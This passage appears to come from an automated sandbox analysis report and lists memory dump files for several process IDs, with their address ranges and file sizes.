        • memory/3724-140-0x00007FFF3F2F0000-0x00007FFF3F323000-memory.dmp

          Filesize

          204KB

        • memory/3724-146-0x00007FFF2CB00000-0x00007FFF2D020000-memory.dmp

          Filesize

          5.1MB

        • memory/3724-147-0x00007FFF417D0000-0x00007FFF417F3000-memory.dmp

          Filesize

          140KB

        • memory/3724-141-0x00007FFF3B780000-0x00007FFF3B84D000-memory.dmp

          Filesize

          820KB

        • memory/3724-130-0x00007FFF416C0000-0x00007FFF416D9000-memory.dmp

          Filesize

          100KB

        • memory/3724-129-0x00007FFF3B850000-0x00007FFF3B9C7000-memory.dmp

          Filesize

          1.5MB

        • memory/3724-118-0x00007FFF3C310000-0x00007FFF3C333000-memory.dmp

          Filesize

          140KB

        • memory/3724-26-0x00007FFF2D020000-0x00007FFF2D609000-memory.dmp

          Filesize

          5.9MB

        • memory/3724-84-0x00007FFF3B660000-0x00007FFF3B77C000-memory.dmp

          Filesize

          1.1MB

        • memory/3724-80-0x00007FFF3F1D0000-0x00007FFF3F1FD000-memory.dmp

          Filesize

          180KB

        • memory/3724-81-0x00007FFF3F2C0000-0x00007FFF3F2CD000-memory.dmp

          Filesize

          52KB

        • memory/3724-143-0x00007FFF3F2D0000-0x00007FFF3F2E4000-memory.dmp

          Filesize

          80KB

        • memory/3724-74-0x0000021193CC0000-0x00000211941E0000-memory.dmp

          Filesize

          5.1MB

        • memory/3724-78-0x00007FFF3F2D0000-0x00007FFF3F2E4000-memory.dmp

          Filesize

          80KB

        • memory/3724-75-0x00007FFF2CB00000-0x00007FFF2D020000-memory.dmp

          Filesize

          5.1MB

        • memory/3724-76-0x00007FFF417D0000-0x00007FFF417F3000-memory.dmp

          Filesize

          140KB

        • memory/3724-73-0x00007FFF3B780000-0x00007FFF3B84D000-memory.dmp

          Filesize

          820KB

        • memory/3724-68-0x00007FFF3F2F0000-0x00007FFF3F323000-memory.dmp

          Filesize

          204KB

        • memory/3724-66-0x00007FFF40E40000-0x00007FFF40E4D000-memory.dmp

          Filesize

          52KB

        • memory/3724-64-0x00007FFF416C0000-0x00007FFF416D9000-memory.dmp

          Filesize

          100KB

        • memory/3724-60-0x00007FFF3C310000-0x00007FFF3C333000-memory.dmp

          Filesize

          140KB

        • memory/3724-58-0x00007FFF43E00000-0x00007FFF43E19000-memory.dmp

          Filesize

          100KB

        • memory/3724-56-0x00007FFF3F1D0000-0x00007FFF3F1FD000-memory.dmp

          Filesize

          180KB

        • memory/3724-31-0x00007FFF417D0000-0x00007FFF417F3000-memory.dmp

          Filesize

          140KB

        • memory/3724-50-0x00007FFF456A0000-0x00007FFF456AF000-memory.dmp

          Filesize

          60KB

        • memory/4520-94-0x000001593E510000-0x000001593E532000-memory.dmp

          Filesize

          136KB

        • memory/5052-270-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-271-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-272-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-282-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-281-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-280-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-279-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-278-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-277-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB

        • memory/5052-276-0x0000021F5BBA0000-0x0000021F5BBA1000-memory.dmp

          Filesize

          4KB